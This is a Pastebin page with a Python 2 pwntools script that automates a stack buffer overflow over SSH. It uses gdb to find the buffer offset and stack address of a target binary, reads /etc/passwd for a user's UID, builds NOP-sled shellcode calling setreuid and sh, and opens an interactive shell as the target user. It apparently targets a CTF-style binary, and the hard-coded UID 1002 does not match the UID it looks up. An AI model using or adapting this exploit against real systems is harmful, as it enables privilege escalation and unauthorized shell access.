Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- import argparse
- from pwn import *
- ####################################
- ###CONFIG###
- ####################################
- parser = argparse.ArgumentParser(description='H4x yourself a Gibson.')
- parser.add_argument('--nops', type=int, nargs='?', default=100, help='the number of nops with which to pad the shellcode')
- parser.add_argument('--cyclic-length', type=int, nargs='?', default=512, help='the number of cycles to generate when autodetecting buffer size')
- parser.add_argument('-gdb-command', type=str, nargs='?', default='gdb', help='the command which runs gdb on the TARGET machine')
- parser.add_argument('-t', '--target-user', type=str, nargs='?', default='root', help='the user who is to be emulated with setreuid')
- parser.add_argument('-p', '--password', type=str, nargs='?', default='', help='the password with which to ssh into the server')
- parser.add_argument('host', metavar='HOST', type=str, nargs=1, help='the host to which to connect via ssh. FORMAT: username@host:port')
- parser.add_argument('executable', metavar='EXECUTABLE', type=str, nargs=1, help='the executable to exploit')
- parser.add_argument('-a', '--args', type=str, nargs='?', default='', help='optional arguments to pass to the provided executable')
- parser.add_argument('target_function', metavar='TARGET', type=str, nargs=1, help='the function call which is to be targeted for exploitation')
- args = parser.parse_args()
- # Connection config
- try:
- user = args.host[0].split('@')[0]
- password = args.password
- host = args.host[0].split('@')[1].split(':')[0]
- port = int(args.host[0].split('@')[1].split(':')[1])
- except (IndexError, ValueError) as e:
- parser.print_help()
- sys.exit(5)
- # Exploit config
- binary = args.executable[0]
- execargs = args.args.split(' ')
- vuln_func = args.target_function[0]
- target_user = args.target_user
- # GDB config
- gdb_path = args.gdb_command
- cyclic_length = args.cyclic_length
- # Shellcode copnfig
- num_nops = args.nops
- # Context config
- context.arch = 'amd64'
- context.os = 'linux'
- ####################################
- ###Functions###
- ####################################
- def gdb_get_attributes(gdb_proc):
- gdb_proc.recvuntil('(gdb)')
- if (len(execargs) != 0):
- gdb_proc.sendline('set args ' + ' '.join(execargs))
- gdb_proc.recvuntil('(gdb)')
- gdb_proc.sendline('unset env LINES')
- gdb_proc.recvuntil('(gdb)')
- gdb_proc.sendline('unset env COLUMNS')
- gdb_proc.recvuntil('(gdb)')
- gdb_proc.sendline('break * ' + vuln_func)
- gdb_proc.recvuntil('(gdb)')
- buf_size = get_vuln_buffer_size(gdb_proc)
- stack_pointer = get_vuln_stack_pointer(gdb_proc)
- return {'buf_size' : buf_size, 'stack_pointer' : stack_pointer}
- def get_vuln_buffer_size(gdb_proc):
- print('Building cyclic pattern to calculate shellcode injection length.')
- pattern = cyclic_metasploit(cyclic_length)
- gdb_proc.sendline('run')
- gdb_proc.recvuntil('(gdb)')
- gdb_proc.sendline('nexti')
- gdb_proc.recvuntil('Enter the administrator password:')
- gdb_proc.sendline(pattern)
- gdb_proc.recvuntil('(gdb)')
- gdb_proc.sendline('x/2x $rbp')
- rbp_pattern = gdb_proc.recvuntil('(gdb)')
- print(rbp_pattern)
- words = [int(w, 0) for w in rbp_pattern.split('\n')[0].split('\t')[1:]]
- chars = ''.join([pack(w, 32, 'little', True) for w in words])
- print('Found pattern ' + chars + ' in rbp.')
- size = cyclic_metasploit_find(chars)
- print('Detected a buffer size of ' + hex(size) + ' bytes.')
- offset = size + 0x8
- print('Final offset is ' + hex(offset) + ' bytes.')
- return offset
- def get_vuln_stack_pointer(gdb_proc):
- print('Detecting stack pointer.')
- gdb_proc.sendline('run')
- gdb_proc.sendline('y')
- gdb_proc.recvuntil('(gdb)')
- gdb_proc.sendline('x $rsp')
- rsp_addr = int(gdb_proc.recvuntil('(gdb)').split('\n')[0].split('\t')[0][:-1], 0)
- print('Stack pointer found at address ' + hex(rsp_addr) + '.')
- return rsp_addr
- ####################################
- ###Main###
- ####################################
- conn = ssh(user=user, password=password, host=host, port=port)
- print('''
- --------------------------------------
- STAGE 1: BEGINNING EXPLOIT AUTOCONFIGURATION
- --------------------------------------
- ''')
- # Grab information from debugging the vuln binary.
- gdb_proc = conn.process(argv=[gdb_path, binary])
- attributes = gdb_get_attributes(gdb_proc)
- gdb_proc.close()
- # Grab information from the filesystem.
- print('Attempting to grab user id for target user \'' + target_user + '\'.')
- etc_passwd = conn.download_data('/etc/passwd').split('\n')
- uid = 0
- for user in etc_passwd:
- data = user.split(':')
- if (data[0] == target_user):
- uid = int(data[2])
- break
- print('Using UID ' + str(uid) + '.')
- print('''
- --------------------------------------
- EXPLOIT AUTOCONFIGURATION COMPLETE
- --------------------------------------
- ''')
- print('''--------------------------------------
- STAGE 2: GENERATING SHELLCODE
- --------------------------------------
- ''')
- shellcode = ''
- shellcode += asm(shellcraft.setreuid(1002))
- shellcode += asm(shellcraft.sh())
- print(disasm(shellcode))
- shellcode = (asm('nop') * num_nops) + shellcode
- #print(disasm(shellcode))
- shellcode += asm('nop') * max((attributes['buf_size'] - len(shellcode)), 0x8)
- print('\nPadded shellcode length: ' + hex(len(shellcode)) + ' bytes.')
- entry_point = attributes['stack_pointer'] + (num_nops // 2)
- print('Guessed entry point: ' + hex(entry_point) + '\n')
- shellcode += p64(entry_point)
- print(hexdump(shellcode))
- print('''
- --------------------------------------
- SHELLCODE GENERATION COMPLETE
- --------------------------------------
- ''')
- print('''--------------------------------------
- STAGE 3: ATTEMPTING EXPLOIT
- --------------------------------------
- ''')
- vuln_proc = conn.process(argv=[binary] + execargs)
- vuln_proc.sendline(shellcode)
- vuln_proc.recvuntil('$ ')
- vuln_proc.sendline('whoami')
- whoami_result = vuln_proc.recvuntil('$ ').split('\n')[0]
- if (whoami_result == target_user):
- print('You got the shell :D')
- vuln_proc.sendline('cd /home/' + target_user)
- else:
- print('Something went wrong. You got the shell, but are the wrong user D:')
- vuln_proc.interactive(prompt = pwnlib.term.text.bold_red('\x08 \x08\x08 \x08' + whoami_result + '@' + host) + ':# ')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement